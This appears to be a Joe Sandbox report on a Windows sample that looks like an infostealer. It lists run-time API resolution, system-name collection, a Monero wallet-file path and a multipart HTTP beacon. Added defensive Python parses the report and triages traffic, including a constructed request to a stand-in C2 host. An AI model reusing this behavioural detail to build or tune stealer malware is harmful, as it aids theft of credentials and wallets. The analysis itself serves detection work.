14362->14363 14364 8a45c0 2 API calls 14363->14364 14365 8a3bcc 14364->14365 14366 8a45c0 2 API calls 14365->14366 14367 8a3be5 14366->14367 14368 8a45c0 2 API calls 14367->14368 14369 8a3bfe 14368->14369 14370 8a45c0 2 API calls 14369->14370 14371 8a3c17 14370->14371 14372 8a45c0 2 API calls 14371->14372 14373 8a3c30 14372->14373 14374 8a45c0 2 API calls 14373->14374 14375 8a3c49 14374->14375 14376 8a45c0 2 API calls 14375->14376 14377 8a3c62 14376->14377 14378 8a45c0 2 API calls 14377->14378 14379 8a3c7b 14378->14379 14380 8a45c0 2 API calls 14379->14380 14381 8a3c94 14380->14381 14382 8a45c0 2 API calls 14381->14382 14383 8a3cad 14382->14383 14384 8a45c0 2 API calls 14383->14384 14385 8a3cc6 14384->14385 14386 8a45c0 2 API calls 14385->14386 14387 8a3cdf 14386->14387 14388 8a45c0 2 API calls 14387->14388 14389 8a3cf8 14388->14389 14390 8a45c0 2 API calls 14389->14390 14391 8a3d11 14390->14391 14392 8a45c0 2 API calls 14391->14392 14393 8a3d2a 14392->14393 14394 8a45c0 2 API calls 14393->14394 14395 8a3d43 14394->14395 14396 8a45c0 2 API calls 14395->14396 14397 8a3d5c 14396->14397 14398 8a45c0 2 API calls 14397->14398 14399 8a3d75 14398->14399 14400 8a45c0 2 API calls 14399->14400 14401 8a3d8e 14400->14401 14402 8a45c0 2 API calls 14401->14402 14403 8a3da7 14402->14403 14404 8a45c0 2 API calls 14403->14404 14405 8a3dc0 14404->14405 14406 8a45c0 2 API calls 14405->14406 14407 8a3dd9 14406->14407 14408 8a45c0 2 API calls 14407->14408 14409 8a3df2 14408->14409 14410 8a45c0 2 API calls 14409->14410 14411 8a3e0b 14410->14411 14412 8a45c0 2 API calls 14411->14412 14413 8a3e24 14412->14413 14414 8a45c0 2 API calls 14413->14414 14415 8a3e3d 14414->14415 14416 8a45c0 2 API calls 14415->14416 14417 8a3e56 14416->14417 14418 8a45c0 2 API calls 14417->14418 14419 8a3e6f 14418->14419 14420 8a45c0 2 API calls 14419->14420 14421 8a3e88 14420->14421 14422 8a45c0 2 API calls 14421->14422 14423 8a3ea1 14422->14423 14424 8a45c0 2 API calls 14423->14424 14425 8a3eba 14424->14425 
14426 8a45c0 2 API calls 14425->14426 14427 8a3ed3 14426->14427 14428 8a45c0 2 API calls 14427->14428 14429 8a3eec 14428->14429 14430 8a45c0 2 API calls 14429->14430 14431 8a3f05 14430->14431 14432 8a45c0 2 API calls 14431->14432 14433 8a3f1e 14432->14433 14434 8a45c0 2 API calls 14433->14434 14435 8a3f37 14434->14435 14436 8a45c0 2 API calls 14435->14436 14437 8a3f50 14436->14437 14438 8a45c0 2 API calls 14437->14438 14439 8a3f69 14438->14439 14440 8a45c0 2 API calls 14439->14440 14441 8a3f82 14440->14441 14442 8a45c0 2 API calls 14441->14442 14443 8a3f9b 14442->14443 14444 8a45c0 2 API calls 14443->14444 14445 8a3fb4 14444->14445 14446 8a45c0 2 API calls 14445->14446 14447 8a3fcd 14446->14447 14448 8a45c0 2 API calls 14447->14448 14449 8a3fe6 14448->14449 14450 8a45c0 2 API calls 14449->14450 14451 8a3fff 14450->14451 14452 8a45c0 2 API calls 14451->14452 14453 8a4018 14452->14453 14454 8a45c0 2 API calls 14453->14454 14455 8a4031 14454->14455 14456 8a45c0 2 API calls 14455->14456 14457 8a404a 14456->14457 14458 8a45c0 2 API calls 14457->14458 14459 8a4063 14458->14459 14460 8a45c0 2 API calls 14459->14460 14461 8a407c 14460->14461 14462 8a45c0 2 API calls 14461->14462 14463 8a4095 14462->14463 14464 8a45c0 2 API calls 14463->14464 14465 8a40ae 14464->14465 14466 8a45c0 2 API calls 14465->14466 14467 8a40c7 14466->14467 14468 8a45c0 2 API calls 14467->14468 14469 8a40e0 14468->14469 14470 8a45c0 2 API calls 14469->14470 14471 8a40f9 14470->14471 14472 8a45c0 2 API calls 14471->14472 14473 8a4112 14472->14473 14474 8a45c0 2 API calls 14473->14474 14475 8a412b 14474->14475 14476 8a45c0 2 API calls 14475->14476 14477 8a4144 14476->14477 14478 8a45c0 2 API calls 14477->14478 14479 8a415d 14478->14479 14480 8a45c0 2 API calls 14479->14480 14481 8a4176 14480->14481 14482 8a45c0 2 API calls 14481->14482 14483 8a418f 14482->14483 14484 8a45c0 2 API calls 14483->14484 14485 8a41a8 14484->14485 14486 8a45c0 2 API calls 14485->14486 14487 8a41c1 14486->14487 14488 8a45c0 2 

                              Control-flow Graph
                              Basic blocks (id: address range, calls made) and their successor edges:
                              • 660: 8b9860-8b9874 call 8b9750 -> 663, 664
                              • 663: 8b987a-8b9a8e call 8b9780 GetProcAddress * 21 -> 664
                              • 664: 8b9a93-8b9af2 LoadLibraryA * 5 -> 666, 667
                              • 666: 8b9b0d-8b9b14 -> 669, 670
                              • 667: 8b9af4-8b9b08 GetProcAddress -> 666
                              • 669: 8b9b46-8b9b4d -> 671, 672
                              • 670: 8b9b16-8b9b41 GetProcAddress * 2 -> 669
                              • 671: 8b9b68-8b9b6f -> 673, 674
                              • 672: 8b9b4f-8b9b63 GetProcAddress -> 671
                              • 673: 8b9b89-8b9b90 -> 675, 676
                              • 674: 8b9b71-8b9b84 GetProcAddress -> 673
                              • 675: 8b9b92-8b9bbc GetProcAddress * 2 -> 676
                              • 676: 8b9bc1-8b9bc2
                              APIs
                              • GetProcAddress.KERNEL32(75900000,01420408), ref: 008B98A1
                              • GetProcAddress.KERNEL32(75900000,01420618), ref: 008B98BA
                              • GetProcAddress.KERNEL32(75900000,01420630), ref: 008B98D2
                              • GetProcAddress.KERNEL32(75900000,01420678), ref: 008B98EA
                              • GetProcAddress.KERNEL32(75900000,014206A8), ref: 008B9903
                              • GetProcAddress.KERNEL32(75900000,014286D0), ref: 008B991B
                              • GetProcAddress.KERNEL32(75900000,01415D48), ref: 008B9933
                              • GetProcAddress.KERNEL32(75900000,01415B88), ref: 008B994C
                              • GetProcAddress.KERNEL32(75900000,01420420), ref: 008B9964
                              • GetProcAddress.KERNEL32(75900000,014204E0), ref: 008B997C
                              • GetProcAddress.KERNEL32(75900000,014203F0), ref: 008B9995
                              • GetProcAddress.KERNEL32(75900000,01420540), ref: 008B99AD
                              • GetProcAddress.KERNEL32(75900000,01415AC8), ref: 008B99C5
                              • GetProcAddress.KERNEL32(75900000,01420468), ref: 008B99DE
                              • GetProcAddress.KERNEL32(75900000,014204F8), ref: 008B99F6
                              • GetProcAddress.KERNEL32(75900000,01415C68), ref: 008B9A0E
                              • GetProcAddress.KERNEL32(75900000,01420558), ref: 008B9A27
                              • GetProcAddress.KERNEL32(75900000,01420720), ref: 008B9A3F
                              • GetProcAddress.KERNEL32(75900000,01415E08), ref: 008B9A57
                              • GetProcAddress.KERNEL32(75900000,01420768), ref: 008B9A70
                              • GetProcAddress.KERNEL32(75900000,01415E48), ref: 008B9A88
                              • LoadLibraryA.KERNEL32(014206F0,?,008B6A00), ref: 008B9A9A
                              • LoadLibraryA.KERNEL32(01420750,?,008B6A00), ref: 008B9AAB
                              • LoadLibraryA.KERNEL32(014206D8,?,008B6A00), ref: 008B9ABD
                              • LoadLibraryA.KERNEL32(01420780,?,008B6A00), ref: 008B9ACF
                              • LoadLibraryA.KERNEL32(01420738,?,008B6A00), ref: 008B9AE0
                              • GetProcAddress.KERNEL32(75070000,01420708), ref: 008B9B02
                              • GetProcAddress.KERNEL32(75FD0000,01420798), ref: 008B9B23
                              • GetProcAddress.KERNEL32(75FD0000,01428C70), ref: 008B9B3B
                              • GetProcAddress.KERNEL32(75A50000,01428D48), ref: 008B9B5D
                              • GetProcAddress.KERNEL32(74E50000,01415E28), ref: 008B9B7E
                              • GetProcAddress.KERNEL32(76E80000,01428730), ref: 008B9B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 008B9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 008B9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: fc4067b84bf907fb5d79119870a2b08d77ff3de09ec9b1df36330e413cdba007
                              • Instruction ID: e450105993da072694e0b4033423b9389cf2544a5416fdbc51f738f8ad5950f6
                              • Opcode Fuzzy Hash: fc4067b84bf907fb5d79119870a2b08d77ff3de09ec9b1df36330e413cdba007
                              • Instruction Fuzzy Hash: 64A11EBA5002C09FD354EFE8EDD89563BF9F76C301715851EA605CB264D639B883CB62
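Reading the block above in call order: the 21 GetProcAddress calls in block 663 all take the same module handle (75900000); the five LoadLibraryA calls in block 664 return five further handles (75070000, 75FD0000, 75A50000, 74E50000, 76E80000), and each of those is tested before the follow-up GetProcAddress calls in blocks 667, 670, 672, 674 and 675. Only one of the 28 name arguments is shown as text (NtQueryInformationProcess, which identifies the 76E80000 handle as ntdll.dll, the module that exports it); the other 27 are raw pointers into 0x01415000-0x01428FFF that the plugin could not resolve to a string, which is what run-time-decrypted import names look like in this view. The Python below is an added example, not code from the report or from the sample: it parses the APIs lines above into exactly that summary. REPORT_LINES is copied from the report; the threshold in looks_like_api_resolver is an assumption of the example, not a Joe Sandbox rule.

```python
import re
from collections import Counter

# Added example (not Joe Sandbox code and not code from the analysed sample):
# a parser for the "APIs" lines of a function block, used to summarise how the
# routine at 0x8b9860 resolves its imports at run time. REPORT_LINES is copied
# from the report; the threshold in looks_like_api_resolver() is an assumption.
REPORT_LINES = """
• GetProcAddress.KERNEL32(75900000,01420408), ref: 008B98A1
• GetProcAddress.KERNEL32(75900000,01420618), ref: 008B98BA
• GetProcAddress.KERNEL32(75900000,01420630), ref: 008B98D2
• GetProcAddress.KERNEL32(75900000,01420678), ref: 008B98EA
• GetProcAddress.KERNEL32(75900000,014206A8), ref: 008B9903
• GetProcAddress.KERNEL32(75900000,014286D0), ref: 008B991B
• GetProcAddress.KERNEL32(75900000,01415D48), ref: 008B9933
• GetProcAddress.KERNEL32(75900000,01415B88), ref: 008B994C
• GetProcAddress.KERNEL32(75900000,01420420), ref: 008B9964
• GetProcAddress.KERNEL32(75900000,014204E0), ref: 008B997C
• GetProcAddress.KERNEL32(75900000,014203F0), ref: 008B9995
• GetProcAddress.KERNEL32(75900000,01420540), ref: 008B99AD
• GetProcAddress.KERNEL32(75900000,01415AC8), ref: 008B99C5
• GetProcAddress.KERNEL32(75900000,01420468), ref: 008B99DE
• GetProcAddress.KERNEL32(75900000,014204F8), ref: 008B99F6
• GetProcAddress.KERNEL32(75900000,01415C68), ref: 008B9A0E
• GetProcAddress.KERNEL32(75900000,01420558), ref: 008B9A27
• GetProcAddress.KERNEL32(75900000,01420720), ref: 008B9A3F
• GetProcAddress.KERNEL32(75900000,01415E08), ref: 008B9A57
• GetProcAddress.KERNEL32(75900000,01420768), ref: 008B9A70
• GetProcAddress.KERNEL32(75900000,01415E48), ref: 008B9A88
• LoadLibraryA.KERNEL32(014206F0,?,008B6A00), ref: 008B9A9A
• LoadLibraryA.KERNEL32(01420750,?,008B6A00), ref: 008B9AAB
• LoadLibraryA.KERNEL32(014206D8,?,008B6A00), ref: 008B9ABD
• LoadLibraryA.KERNEL32(01420780,?,008B6A00), ref: 008B9ACF
• LoadLibraryA.KERNEL32(01420738,?,008B6A00), ref: 008B9AE0
• GetProcAddress.KERNEL32(75070000,01420708), ref: 008B9B02
• GetProcAddress.KERNEL32(75FD0000,01420798), ref: 008B9B23
• GetProcAddress.KERNEL32(75FD0000,01428C70), ref: 008B9B3B
• GetProcAddress.KERNEL32(75A50000,01428D48), ref: 008B9B5D
• GetProcAddress.KERNEL32(74E50000,01415E28), ref: 008B9B7E
• GetProcAddress.KERNEL32(76E80000,01428730), ref: 008B9B9F
• GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 008B9BB6
""".strip().splitlines()

API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
HEX32 = re.compile(r"^[0-9A-F]{8}$")


def parse_api_lines(lines):
    """Return (api, dll, [args], ref) for every well-formed report 'APIs' line."""
    calls = []
    for line in lines:
        m = API_LINE.match(line.strip())
        if m:
            calls.append((m["api"], m["dll"], m["args"].split(","), m["ref"]))
    return calls


def summarize_import_resolution(lines):
    """Group GetProcAddress calls by module handle and separate literal names
    from name arguments the plugin could only show as raw pointers."""
    calls = parse_api_lines(lines)
    per_module = Counter()
    literal, opaque = [], 0
    for api, _dll, args, ref in calls:
        if api != "GetProcAddress":
            continue
        hmodule, name = args[0], args[1]
        per_module[hmodule] += 1
        if HEX32.match(name):      # pointer only: the name is not readable in the dump
            opaque += 1
        else:
            literal.append((name, ref))
    return {
        "getprocaddress": sum(per_module.values()),
        "loadlibrary": sum(api.startswith("LoadLibrary") for api, *_ in calls),
        "per_module": dict(per_module),
        "literal_names": literal,
        "opaque_name_ptrs": opaque,
    }


def looks_like_api_resolver(summary, min_resolves=8):
    """Assumed triage rule: many resolves, and most name arguments non-literal."""
    n = summary["getprocaddress"]
    return n >= min_resolves and summary["opaque_name_ptrs"] * 2 > n


if __name__ == "__main__":
    s = summarize_import_resolution(REPORT_LINES)
    for hmod, count in sorted(s["per_module"].items(), key=lambda kv: -kv[1]):
        print(f"module {hmod}: {count} GetProcAddress call(s)")
    print("LoadLibraryA calls:", s["loadlibrary"])
    print("plaintext names:", s["literal_names"])
    print("resolver stub:", looks_like_api_resolver(s))
```

Run directly it prints the per-module counts (21 for 75900000, 2 each for 75FD0000 and 76E80000, 1 each for the rest). Fed the APIs lines of the following function blocks on this page, which contain no GetProcAddress call at all, looks_like_api_resolver returns False, which is the intended triage split between this resolver stub and ordinary code.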

                              Control-flow Graph
                              Basic blocks (id: address range, calls made) and their successor edges:
                              • 764: 8a45c0-8a4695 RtlAllocateHeap -> 781
                              • 781: 8a46a0-8a46a6 -> 782, 783
                              • 782: 8a474f-8a47a9 VirtualProtect
                              • 783: 8a46ac-8a474a -> 781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008A460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 008A479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008A45C7, 008A45D2, 008A45DD, 008A45E8, 008A45F3, 008A4617, 008A4622, 008A462D, 008A4638, 008A4643, 008A4657, 008A4662, 008A466D, 008A4678, 008A4683, 008A46AC, 008A46B7, 008A46C2, 008A46CD, 008A46D8, 008A4713, 008A471E, 008A4729, 008A4734, 008A473F, 008A474F, 008A475A, 008A4765, 008A4770, 008A477B (30 references, spread over the basic blocks 764, 783 and 782 of this function)
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the report lists this single sentence 30 times, $-separated, one entry per xref under Strings; the text plays no part in the heap allocation or the VirtualProtect call this function makes and appears to be filler)
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 14d1667ebc26c8cf9a74b28f254ec4278cb141d3748cd9da85b23e7a3b87440c
                              • Instruction ID: d7bf078aaef8b0fdc3039ea299dd465f22ca7d94d2594b4d161ed088869bcc95
                              • Opcode Fuzzy Hash: 14d1667ebc26c8cf9a74b28f254ec4278cb141d3748cd9da85b23e7a3b87440c
                              • Instruction Fuzzy Hash: D141C2707CB688AB8A2CB6A5A84DFDD7A75BB42F00B50505EAC2899380DFB4B9C04519

                              Control-flow Graph
                              Basic blocks (id: address range, calls made) and their successor edges:
                              • 801: 8a4880-8a4942 call 8ba7a0 call 8a47b0 call 8ba740 * 5 InternetOpenA StrCmpCA -> 816, 817
                              • 816: 8a494b-8a494f -> 818, 819
                              • 817: 8a4944 -> 816
                              • 818: 8a4ecb-8a4ef3 InternetCloseHandle call 8baad0 call 8a9ac0 -> 829, 830
                              • 819: 8a4955-8a4acd call 8b8b60 call 8ba920 call 8ba8a0 call 8ba800 * 2 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba920 call 8ba8a0 call 8ba800 * 2 InternetConnectA -> 818, 905
                              • 829: 8a4f32-8a4fa2 call 8b8990 * 2 call 8ba7a0 call 8ba800 * 8
                              • 830: 8a4ef5-8a4f2d call 8ba820 call 8ba9b0 call 8ba8a0 call 8ba800 -> 829
                              • 905: 8a4ad3-8a4ad7 -> 906, 907
                              • 906: 8a4ad9-8a4ae3 -> 908
                              • 907: 8a4ae5 -> 908
                              • 908: 8a4aef-8a4b22 HttpOpenRequestA -> 909, 910
                              • 909: 8a4b28-8a4e28 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba9b0 call 8ba8a0 call 8ba800 call 8ba920 call 8ba8a0 call 8ba800 call 8ba740 call 8ba920 * 2 call 8ba8a0 call 8ba800 * 2 call 8baad0 lstrlen call 8baad0 * 2 lstrlen call 8baad0 HttpSendRequestA -> 1021
                              • 910: 8a4ebe-8a4ec5 InternetCloseHandle -> 818
                              • 1021: 8a4e32-8a4e5c InternetReadFile -> 1022, 1023
                              • 1022: 8a4e5e-8a4e65 -> 1023, 1024
                              • 1023: 8a4e67-8a4eb9 InternetCloseHandle call 8ba800 -> 910
                              • 1024: 8a4e69-8a4ea7 call 8ba9b0 call 8ba8a0 call 8ba800 -> 1021
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                                • Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008A4915
                              • StrCmpCA.SHLWAPI(?,0142F028), ref: 008A493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,008C0DDB,00000000,?,?,00000000,?,",00000000,?,0142F0E8), ref: 008A4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008A4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008A4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008A4E49
                              • InternetCloseHandle.WININET(00000000), ref: 008A4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 008A4EC5
                              • HttpOpenRequestA.WININET(00000000,0142F038,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A4B15
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • InternetCloseHandle.WININET(00000000), ref: 008A4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: b563f66300a5ee538bf0eae5f9286dae3a4627841b37ec5acd84f8f45d057b69
                              • Instruction ID: 9bd9f07ffeff906c61d7dc39db17ff030d1c55177e09871211852fc89edac548
                              • Opcode Fuzzy Hash: b563f66300a5ee538bf0eae5f9286dae3a4627841b37ec5acd84f8f45d057b69
                              • Instruction Fuzzy Hash: EC12FC71910118AADB19EB94DCA2FEEB738FF14300F5041A9B106A6691EF706F49CF63
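What the block above documents, read in call order: InternetOpenA is called with a NULL agent string and access type 1 (INTERNET_OPEN_TYPE_DIRECT), so the request goes out without a User-Agent header; InternetConnectA uses service type 3 (INTERNET_SERVICE_HTTP) and no credentials; HttpOpenRequestA is opened with dwFlags 0x00400100, which is INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE; block 909 assembles the body through the string helpers 8ba9b0/8ba920/8ba8a0 from the double-quote and "------" literals listed under String ID, the shape of a multipart/form-data body, and sends it with HttpSendRequestA; blocks 1021, 1022 and 1024 then loop on InternetReadFile with a 0x7CF-byte (1999-byte) buffer until the read fails or returns nothing, and the three InternetCloseHandle calls tear down request, connection and session. The \Monero\wallet.keys argument shown under the 8BA9B0 subcall was most likely captured from a different caller of that shared string-concatenation helper and is not part of this request. The Python below is an added example, not code from the report or from the sample: it decodes the HttpOpenRequestA flag value and triages a raw request for the two traits above (missing User-Agent, dash-only multipart boundary), listing the form fields the body carries. SAMPLE_REQUEST, its host c2.invalid and the field names hwid and build are constructed for the example.

```python
import re

# Added example; not code from the Joe Sandbox report or from the analysed
# sample. decode_flags() names the bits of a WinINet dwFlags argument such as
# the 0x00400100 the report shows for HttpOpenRequestA. triage_request()
# checks a raw HTTP request for the traits this function's WinINet calls
# produce: no User-Agent (InternetOpenA with a NULL agent string) and a
# multipart/form-data boundary made only of dashes. SAMPLE_REQUEST is
# constructed here; its host, path and field names are invented.

# wininet.h dwFlags values.
INTERNET_FLAGS = {
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x80000000: "INTERNET_FLAG_RELOAD",
}


def decode_flags(value, table=INTERNET_FLAGS):
    """Name the bits set in a WinINet dwFlags argument; unknown bits stay hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(f"0x{unknown:08X}")
    return names


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, target, _version = request_line.split(b" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def multipart_boundary(content_type):
    """Return the boundary parameter of a multipart Content-Type, else None."""
    for param in content_type.split(b";")[1:]:
        key, _, value = param.strip().partition(b"=")
        if key.lower() == b"boundary":
            return value.strip(b'"')
    return None


def triage_request(raw):
    """Collect the beacon-shape traits found in one raw request."""
    method, target, headers, body = parse_request(raw)
    findings = []
    if b"user-agent" not in headers:
        findings.append("no User-Agent header")
    boundary = multipart_boundary(headers.get(b"content-type", b""))
    fields = []
    if boundary is not None:
        if boundary and set(boundary) == {ord("-")}:
            findings.append("multipart boundary consists only of dashes")
        if b"--" + boundary not in body:      # delimiter lines are "--" + boundary
            findings.append("boundary never appears in body")
        fields = re.findall(rb'name="([^"]*)"', body)
    return {"method": method, "target": target, "boundary": boundary,
            "fields": fields, "findings": findings}


# Constructed sample: boundary "------" gives delimiter lines of eight dashes
# and a closing line of ten, which matches the dash-run literals above.
SAMPLE_BODY = (
    b"--------\r\nContent-Disposition: form-data; name=\"hwid\"\r\n\r\nABCD1234\r\n"
    b"--------\r\nContent-Disposition: form-data; name=\"build\"\r\n\r\ndemo\r\n"
    b"----------\r\n"
)
SAMPLE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: c2.invalid\r\n"
    b"Content-Type: multipart/form-data; boundary=------\r\n"
    b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n\r\n" + SAMPLE_BODY
)

if __name__ == "__main__":
    print("HttpOpenRequestA flags:", decode_flags(0x00400100))
    print(triage_request(SAMPLE_REQUEST))
```

The two findings together (no User-Agent at all, a boundary with no random component) are what distinguish this request from a browser or library upload; a request with a normal User-Agent and no multipart body comes back with an empty findings list, so the function is usable as a filter over captured traffic as well as on the constructed sample.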
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: abd821a9d3789ad7007a6f2e314d96a48d96fac14e115a704075b626821ddeca
                              • Instruction ID: 83bdfdb157053bc6754a5c7c025fe0be1e1cdaa271e5bd35e7c98785826775c6
                              • Opcode Fuzzy Hash: abd821a9d3789ad7007a6f2e314d96a48d96fac14e115a704075b626821ddeca
                              • Instruction Fuzzy Hash: C70186B1904349EFC710DFD4DD45BAABBB8F744B21F104219F645E7380D77859048BA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmp
